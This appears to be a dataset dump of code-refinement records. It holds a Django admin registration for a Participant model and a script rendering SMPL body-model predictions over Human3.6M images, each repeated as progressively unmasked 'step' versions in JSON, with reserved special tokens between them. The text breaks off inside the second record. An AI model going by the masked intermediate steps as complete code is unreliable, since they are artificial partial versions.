class ParticipantAdmin(admin.ModelAdmin):
fieldsets = [('Personal information', {'fields': ['email', 'name',
'institution', 'assistant']}), ('Asistance', {'fields': [
'assistant', 'participant_hash']}), ('Contribution', {'fields': [
'contribution', 'title', 'abstract', 'link']})]
list_display = 'email', 'name', 'assistant', 'contribution', 'title'
list_filter = ['assistant', 'contribution']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ParticipantAdmin(admin.ModelAdmin):
fieldsets = [('Personal information', {'fields': ['email', 'name',
'institution', 'assistant']}), ('Asistance', {'fields': [
'assistant', 'participant_hash']}), ('Contribution', {'fields': [
'contribution', 'title', 'abstract', 'link']})]
list_display = 'email', 'name', 'assistant', 'contribution', 'title'
list_filter = ['assistant', 'contribution']
admin.site.register(Participant, ParticipantAdmin)
<|reserved_special_token_1|>
from django.contrib import admin
from .models import Participant
class ParticipantAdmin(admin.ModelAdmin):
fieldsets = [('Personal information', {'fields': ['email', 'name',
'institution', 'assistant']}), ('Asistance', {'fields': [
'assistant', 'participant_hash']}), ('Contribution', {'fields': [
'contribution', 'title', 'abstract', 'link']})]
list_display = 'email', 'name', 'assistant', 'contribution', 'title'
list_filter = ['assistant', 'contribution']
admin.site.register(Participant, ParticipantAdmin)
<|reserved_special_token_1|>
from django.contrib import admin
# Register your models here.
from .models import Participant
class ParticipantAdmin(admin.ModelAdmin):
fieldsets = [
("Personal information", {'fields': ['email', 'name', 'institution', 'assistant']}),
("Asistance", {'fields': ['assistant', 'participant_hash']}),
("Contribution", {'fields': ['contribution', 'title', 'abstract', 'link']}),
]
list_display = ('email', 'name', 'assistant', 'contribution', 'title')
list_filter = ['assistant', 'contribution']
admin.site.register(Participant, ParticipantAdmin)
|
flexible
|
{
"blob_id": "c43b899234ffff09225153dcaf097591c7176430",
"index": 841,
"step-1": "<mask token>\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n fieldsets = [('Personal information', {'fields': ['email', 'name',\n 'institution', 'assistant']}), ('Asistance', {'fields': [\n 'assistant', 'participant_hash']}), ('Contribution', {'fields': [\n 'contribution', 'title', 'abstract', 'link']})]\n list_display = 'email', 'name', 'assistant', 'contribution', 'title'\n list_filter = ['assistant', 'contribution']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n fieldsets = [('Personal information', {'fields': ['email', 'name',\n 'institution', 'assistant']}), ('Asistance', {'fields': [\n 'assistant', 'participant_hash']}), ('Contribution', {'fields': [\n 'contribution', 'title', 'abstract', 'link']})]\n list_display = 'email', 'name', 'assistant', 'contribution', 'title'\n list_filter = ['assistant', 'contribution']\n\n\nadmin.site.register(Participant, ParticipantAdmin)\n",
"step-4": "from django.contrib import admin\nfrom .models import Participant\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n fieldsets = [('Personal information', {'fields': ['email', 'name',\n 'institution', 'assistant']}), ('Asistance', {'fields': [\n 'assistant', 'participant_hash']}), ('Contribution', {'fields': [\n 'contribution', 'title', 'abstract', 'link']})]\n list_display = 'email', 'name', 'assistant', 'contribution', 'title'\n list_filter = ['assistant', 'contribution']\n\n\nadmin.site.register(Participant, ParticipantAdmin)\n",
"step-5": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import Participant\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n fieldsets = [\n (\"Personal information\", {'fields': ['email', 'name', 'institution', 'assistant']}),\n (\"Asistance\", {'fields': ['assistant', 'participant_hash']}),\n (\"Contribution\", {'fields': ['contribution', 'title', 'abstract', 'link']}),\n ]\n list_display = ('email', 'name', 'assistant', 'contribution', 'title')\n list_filter = ['assistant', 'contribution']\n\nadmin.site.register(Participant, ParticipantAdmin)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 17:27:57 2020
@author: li
"""
import numpy as np
from opendr.renderer import ColoredRenderer
from opendr.lighting import LambertianPointLight
from opendr.camera import ProjectPoints
import cPickle as pkl
from models.smpl import Smpl, copy_smpl, joints_coco
import h5py
from util import im
from render_model import render_model
from util.imutils import crop
import cv2
import matplotlib.pyplot as plt
from os.path import join
import scipy.io as sio
index = 800
#test_path = '../SPIN_MV/data/h36m_train_S1s_3d.npz'
test_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'
#spin = '../SPIN_MV/S1_single_smplify.npz'
spin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'
#our = '../SPIN_MV/S1_multi_smplify.npz'
our = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'
mpi_inf_valid = np.load(test_path)
ROOT = '../SPIN_MV/data/'
mpi_inf_spin = np.load(spin)
mpi_inf_pred = np.load(our)
IMG_RES = 224
focal_length = 5000
model_file = 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl'
with open(model_file, 'rb') as fp:
model_data = pkl.load(fp)
fig = plt.figure()
#plt.ion()
#gt_keypoints = np.zeros((400,24,4))
for i in range(70563,70564):
imgname = mpi_inf_valid['imgname'][i]
#print(join(ROOT,imgname))
rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)
center = mpi_inf_valid['center'][i]
scale = mpi_inf_valid['scale'][i]
rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])
pose = mpi_inf_pred['pose'][i]
betas = mpi_inf_pred['betas'][i]
camera = mpi_inf_pred['camera'][i]
#gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]
camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
w, h = (IMG_RES, IMG_RES)
rn = ColoredRenderer()
pred_base_smpl = Smpl(model_data)
pred_base_smpl.pose[:] = pose
pred_base_smpl.betas[:] = betas
pred_rot = np.eye(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
pose_spin = mpi_inf_spin['pose'][i]
betas_spin = mpi_inf_spin['betas'][i]
camera = mpi_inf_spin['camera'][i]
camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
rn = ColoredRenderer()
pred_base_smpl.pose[:] = pose_spin
pred_base_smpl.betas[:] = betas_spin
rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
ort = np.reshape(pose_spin[:3],(3,1))
#print(ort)
ort_mat = cv2.Rodrigues(ort)[0]
#print(ort_mat)
trans_mat = np.array([[-1,0,0],
[0,-1,0],
[0,0,1]])
new_ort = ort_mat.dot(trans_mat)
pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
fig = plt.figure()
#plt.subplot(1,3,1)
plt.imshow(rgb_img)
height, width, channels = rgb_img.shape
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_original_%06d.png" % (i), dpi=300)
fig = plt.figure()
#plt.subplot(1,3,2)
plt.imshow(rgb_img)
plt.imshow(im)
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_our_%06d.png" % (i), dpi=300)
#fig = plt.figure()
#plt.subplot()
#plt.imshow(im_1)
# 如果dpi=300,那么图像大小=height*width
# fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
# plt.gca().xaxis.set_major_locator(plt.NullLocator())
# plt.gca().yaxis.set_major_locator(plt.NullLocator())
#plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
#plt.margins(0,0)
#plt.axis('off')
#plt.savefig("../SPIN_MV/save_mpi_smpl/mpi_test_our_view_%04d.png" % (i), dpi=300)
fig = plt.figure()
#plt.subplot(1,3,3)
plt.imshow(rgb_img)
plt.imshow(im_spin)
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_spin_%06d.png" % (i), dpi=300)
#plt.savefig('../SPIN_MV/save_h36m/h36m_test_%06d.png' % i)
#plt.pause(1e-3)
"""
iter_num = 25
batch_size = 4
for i in range(24,25): # iteration number
for j in range(2,3): #batch_size
for k in range(1,2):
imgname = mpi_inf_valid['imgname'][i*batch_size+j][k]
#print(join(ROOT,imgname))
rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)
center = mpi_inf_valid['center'][i*batch_size+j][k]
scale = mpi_inf_valid['scale'][i*batch_size+j][k]
rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])
pose = mpi_inf_pred['pose'][i*batch_size*4+k*4+j]
betas = mpi_inf_pred['betas'][i*batch_size*4+k*4+j]
camera_t = mpi_inf_pred['camera'][i*batch_size*4+k*4+j]
#gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]
#camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
w, h = (IMG_RES, IMG_RES)
rn = ColoredRenderer()
pred_base_smpl = Smpl(model_data)
pred_base_smpl.pose[:] = pose
pred_base_smpl.betas[:] = betas
pred_rot = np.eye(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
pose_spin = mpi_inf_spin['pose'][i*batch_size*4+k*4+j]
betas_spin = mpi_inf_spin['betas'][i*batch_size*4+k*4+j]
camera_t_spin = mpi_inf_spin['camera'][i*batch_size*4+k*4+j]
#camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
rn = ColoredRenderer()
pred_base_smpl.pose[:] = pose_spin
pred_base_smpl.betas[:] = betas_spin
rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
# orignal image
fig = plt.figure()
#plt.imshow(im+)
#plt.subplot(1,3,1)
plt.imshow(rgb_img)
plt.axis('off')
#plt.subplot(1,3,2)
height, width, channels = rgb_img.shape
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_orig.png" % (i*batch_size+j, k), dpi=300)
# multi
fig = plt.figure()
plt.imshow(rgb_img)
plt.imshow(im)
plt.axis('off')
height, width, channels = rgb_img.shape
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_multi.png" % (i*batch_size+j, k), dpi=300)
#plt.imshow(img[sample_idx].transpose((1,2,0)))
#plt.subplot(1,2,1)
# single
fig = plt.figure()
#plt.subplot(1,3,3)
plt.imshow(rgb_img)
#plt.imshow(img[sample_idx].transpose((1,2,0)))
#plt.subplot(1,2,1)
plt.imshow(im_spin)
plt.axis('off')
#plt.ioff()
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_single.png" % (i*batch_size+j, k), dpi=300)
#plt.pause(1e-3)
#plt.show()
"""
"""
H36M_TO_J17 = [6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10, 0, 7, 9]
H36M_TO_J14 = H36M_TO_J17[:14]
J24_TO_J17 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 18, 14, 16, 17]
J24_TO_J14 = J24_TO_J17[:14]
joint_mapper_gt = J24_TO_J14
joint_mapper_h36m = H36M_TO_J14
gt_keypoints = gt_keypoints[:, joint_mapper_gt, :-1]
sio.savemat('../SPIN_MV/evaluation/S1_gt.mat',{'gt_joints17':gt_keypoints})
sio.savemat('../SPIN_MV/evaluation/S1_single_gt.mat',{'pred_joints':mpi_inf_spin['pred_joints']})
sio.savemat('../SPIN_MV/evaluation/S1_multi_gt.mat',{'pred_joints':mpi_inf_pred['pred_joints']})
"""
|
normal
|
{
"blob_id": "2540e2752edaedbf2a011a25cb90f220ae770757",
"index": 7611,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(model_file, 'rb') as fp:\n model_data = pkl.load(fp)\n<mask token>\nfor i in range(70563, 70564):\n imgname = mpi_inf_valid['imgname'][i]\n rgb_img = cv2.imread(join(ROOT, imgname))[:, :, ::-1].copy().astype(np.\n float32)\n center = mpi_inf_valid['center'][i]\n scale = mpi_inf_valid['scale'][i]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i]\n betas = mpi_inf_pred['betas'][i]\n camera = mpi_inf_pred['camera'][i]\n camera_t = np.array([camera[1], camera[2], 2 * focal_length / (IMG_RES *\n camera[0] + 1e-09)])\n w, h = IMG_RES, IMG_RES\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n pose_spin = mpi_inf_spin['pose'][i]\n betas_spin = mpi_inf_spin['betas'][i]\n camera = mpi_inf_spin['camera'][i]\n camera_t_spin = np.array([camera[1], camera[2], 2 * focal_length / (\n IMG_RES * camera[0] + 1e-09)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0\n ].reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=\n np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=\n 20 + dist) * 255.0).astype('uint8')\n ort = np.reshape(pose_spin[:3], (3, 1))\n ort_mat = cv2.Rodrigues(ort)[0]\n trans_mat = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, 1]])\n new_ort = ort_mat.dot(trans_mat)\n pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n fig = plt.figure()\n plt.imshow(rgb_img)\n height, width, channels = rgb_img.shape\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_original_%06d.png' % i, dpi=300\n )\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_our_%06d.png' % i, dpi=300)\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im_spin)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_spin_%06d.png' % i, dpi=300)\n<mask token>\n",
"step-3": "<mask token>\nindex = 800\ntest_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'\nspin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'\nour = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'\nmpi_inf_valid = np.load(test_path)\nROOT = '../SPIN_MV/data/'\nmpi_inf_spin = np.load(spin)\nmpi_inf_pred = np.load(our)\nIMG_RES = 224\nfocal_length = 5000\nmodel_file = (\n 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl')\nwith open(model_file, 'rb') as fp:\n model_data = pkl.load(fp)\nfig = plt.figure()\nfor i in range(70563, 70564):\n imgname = mpi_inf_valid['imgname'][i]\n rgb_img = cv2.imread(join(ROOT, imgname))[:, :, ::-1].copy().astype(np.\n float32)\n center = mpi_inf_valid['center'][i]\n scale = mpi_inf_valid['scale'][i]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i]\n betas = mpi_inf_pred['betas'][i]\n camera = mpi_inf_pred['camera'][i]\n camera_t = np.array([camera[1], camera[2], 2 * focal_length / (IMG_RES *\n camera[0] + 1e-09)])\n w, h = IMG_RES, IMG_RES\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n pose_spin = mpi_inf_spin['pose'][i]\n betas_spin = mpi_inf_spin['betas'][i]\n camera = mpi_inf_spin['camera'][i]\n camera_t_spin = np.array([camera[1], camera[2], 2 * focal_length / (\n IMG_RES * camera[0] + 1e-09)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0\n ].reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=\n np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=\n 20 + dist) * 255.0).astype('uint8')\n ort = np.reshape(pose_spin[:3], (3, 1))\n ort_mat = cv2.Rodrigues(ort)[0]\n trans_mat = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, 1]])\n new_ort = ort_mat.dot(trans_mat)\n pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n fig = plt.figure()\n plt.imshow(rgb_img)\n height, width, channels = rgb_img.shape\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_original_%06d.png' % i, dpi=300\n )\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_our_%06d.png' % i, dpi=300)\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im_spin)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_spin_%06d.png' % i, dpi=300)\n<mask token>\n",
"step-4": "<mask token>\nimport numpy as np\nfrom opendr.renderer import ColoredRenderer\nfrom opendr.lighting import LambertianPointLight\nfrom opendr.camera import ProjectPoints\nimport cPickle as pkl\nfrom models.smpl import Smpl, copy_smpl, joints_coco\nimport h5py\nfrom util import im\nfrom render_model import render_model\nfrom util.imutils import crop\nimport cv2\nimport matplotlib.pyplot as plt\nfrom os.path import join\nimport scipy.io as sio\nindex = 800\ntest_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'\nspin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'\nour = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'\nmpi_inf_valid = np.load(test_path)\nROOT = '../SPIN_MV/data/'\nmpi_inf_spin = np.load(spin)\nmpi_inf_pred = np.load(our)\nIMG_RES = 224\nfocal_length = 5000\nmodel_file = (\n 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl')\nwith open(model_file, 'rb') as fp:\n model_data = pkl.load(fp)\nfig = plt.figure()\nfor i in range(70563, 70564):\n imgname = mpi_inf_valid['imgname'][i]\n rgb_img = cv2.imread(join(ROOT, imgname))[:, :, ::-1].copy().astype(np.\n float32)\n center = mpi_inf_valid['center'][i]\n scale = mpi_inf_valid['scale'][i]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i]\n betas = mpi_inf_pred['betas'][i]\n camera = mpi_inf_pred['camera'][i]\n camera_t = np.array([camera[1], camera[2], 2 * focal_length / (IMG_RES *\n camera[0] + 1e-09)])\n w, h = IMG_RES, IMG_RES\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n pose_spin = mpi_inf_spin['pose'][i]\n betas_spin = mpi_inf_spin['betas'][i]\n camera = mpi_inf_spin['camera'][i]\n camera_t_spin = np.array([camera[1], camera[2], 2 * focal_length / (\n IMG_RES * camera[0] + 1e-09)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0\n ].reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=\n np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=\n 20 + dist) * 255.0).astype('uint8')\n ort = np.reshape(pose_spin[:3], (3, 1))\n ort_mat = cv2.Rodrigues(ort)[0]\n trans_mat = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, 1]])\n new_ort = ort_mat.dot(trans_mat)\n pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n fig = plt.figure()\n plt.imshow(rgb_img)\n height, width, channels = rgb_img.shape\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_original_%06d.png' % i, dpi=300\n )\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_our_%06d.png' % i, dpi=300)\n fig 